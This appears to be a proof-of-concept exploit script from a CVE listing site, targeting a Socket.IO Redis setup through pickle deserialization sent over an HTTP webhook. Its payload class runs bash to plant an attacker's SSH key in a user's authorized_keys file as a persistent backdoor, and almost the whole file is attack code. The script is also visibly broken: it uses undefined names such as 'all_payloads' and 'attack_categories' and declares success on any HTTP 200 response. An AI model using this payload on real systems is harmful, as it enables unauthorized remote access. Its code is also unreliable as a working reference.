4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc.py PY
#!/usr/bin/env python3

import os
import sys
import time
import pickle
import subprocess
import requests
import argparse
import socket
import threading
import zipfile
import tempfile
import json
import base64
from datetime import datetime
from urllib.parse import quote

class SSHBackdoorPayload:
    """Creates SSH backdoor by adding attacker's public key"""
    def __init__(self, ssh_public_key, username="ec2-user"):
        self.ssh_public_key = ssh_public_key
        self.username = username
    
    def __reduce__(self):
        # Multi-step command to create SSH backdoor
        cmd = [
            'bash', '-c',
            f'mkdir -p /home/{self.username}/.ssh /home/{self.username}/.ssh && '
            f'echo "{self.ssh_public_key}" >> /home/{self.username}/.ssh/authorized_keys && '
            f'chmod 700 /home/{self.username}/.ssh /home/{self.username}/.ssh && '
            f'chmod 600 /home/{self.username}/.ssh/authorized_keys /home/{self.username}/.ssh/authorized_keys 2>/dev/null && '
            f'chown -R {self.username}:{self.username} /home/{self.username}/.ssh 2>/dev/null && '
            f'echo "SSH backdoor installed for {self.username}" > /tmp/evidence/ssh_backdoor.txt'
        ]
        return (subprocess.call, (cmd,))

def test_server_connection(server_url):
    try:
        response = requests.get(f"{server_url}/health", timeout=5)
        return response.status_code == 200
    except Exception as e:
        print(f"[-] Server connection failed: {e}")
        return False

def exploit(server_url, channel='socketio', ssh_key=None):
    print("🎯 Socket.IO Redis Pickle Exploitation (via HTTP)")
    print("=" * 50)
    print(f"Target Server: {server_url}")
    print(f"Channel: {channel}")
    print(f"Objective: RCE via pickle.loads() deserialization")
    print()

    # Filter payloads based on selected categories
    payloads = []
    for name, payload_obj, categories in all_payloads:
        if 'all' in attack_categories or any(cat in attack_categories for cat in categories):
            payloads.append((name, payload_obj))
    
    print(f"    [*] Selected {len(payloads)} payloads based on categories: {', '.join(attack_categories)}")
    
    results = []
    
    for name, payload in payloads:
        try:
            serialized = pickle.dumps(payload)
            print(f"    [+] {name}: {len(serialized)} bytes")
            results.append((name, serialized))
        except Exception as e:
            print(f"    [-] {name}: Failed to serialize - {e}")
    
    # Send exploits via HTTP POST
    print(f"[3] Sending exploits to webhook server...")
    
    total_sent = 0
    webhook_url = f"{server_url}/webhook"
    
    for name, payload_data in results:
        try:
            # Send raw pickle data as POST body
            headers = {
                'Content-Type': 'application/octet-stream',
                'X-Channel': channel,
                'X-Payload-Name': name
            }
            
            response = requests.post(
                webhook_url,
                data=payload_data,
                headers=headers,
                timeout=10
            )
            
            if response.status_code == 200:
                resp_data = response.json()
                subscribers = resp_data.get('subscribers', 0)
                print(f"    [+] {name}: HTTP 200, {subscribers} Redis subscribers")
                total_sent += 1
            else:
                print(f"    [-] {name}: HTTP {response.status_code} - {response.text[:100]}")
            
            time.sleep(0.5)  # Small delay between requests
        except Exception as e:
            print(f"    [-] {name}: Request failed - {e}")
    
    # Results
    if total_sent > 0:
        print(f"\n[+] EXPLOITATION SUCCESSFUL!")
        print(f"   {total_sent} payload(s) sent via HTTP webhook")
        
        if ssh_key:
            print(f"\n[+] SSH Backdoor installed:")
            print(f"   - Public key added to ~/.ssh/authorized_keys")
        
        return True
    else:
        print(f"\n[-] No payloads sent successfully")
        print(f"   Check that webhook server is running at {server_url}")
        print(f"   Server should accept POST requests to /webhook endpoint")
        return False

def main():
    parser = argparse.ArgumentParser(description='Socket.IO Redis Pickle Exploitation Demo (HTTP Webhook)')
    parser.add_argument('--url', default='http://localhost:6000', help='Webhook server URL (default: http://localhost:6000)')
    parser.add_argument('--channel', default='socketio', help='Socket.IO channel (default: socketio)')
    parser.add_argument('--ssh-key', default='', help='SSH public key to install as backdoor')
    parser.add_argument('--ssh-key-file', default='', help='File containing SSH public key')
    parser.add_argument('--test-only', action='store_true', help='Only test server connection')
    
    args = parser.parse_args()
    
    if not args.ssh_key and not args.ssh_key_file:
        print("[-] No SSH key provided. Please provide --ssh-key or --ssh-key-file")
        sys.exit(1)
    ssh_key = None
    if args.ssh_key:
        ssh_key = args.ssh_key
    elif args.ssh_key_file:
        try:
            with open(args.ssh_key_file, 'r') as f:
                ssh_key = f.read().strip()
            print(f"[*] Loaded SSH key from {args.ssh_key_file}")
        except Exception as e:
            print(f"[-] Failed to read SSH key file: {e}")
            sys.exit(1)
    
    if args.test_only:
        print("🔍 Testing webhook server connection...")
        success = test_server_connection(args.url)
        if success:
            print("[+] Server connection successful")
        sys.exit(0 if success else 1)
    
    success = exploit(args.url, args.channel, ssh_key)
    
    if success:
        print(f"\n[+] Exploitation completed successfully")
        print(f"[*] Categories tested: {', '.join(args.attack_categories)}")

        if ssh_key:
            print(f"   - SSH backdoor should now be accessible on target servers")
        
    else:
        print(f"\n[-] Exploitation failed")

if __name__ == '__main__':
    main()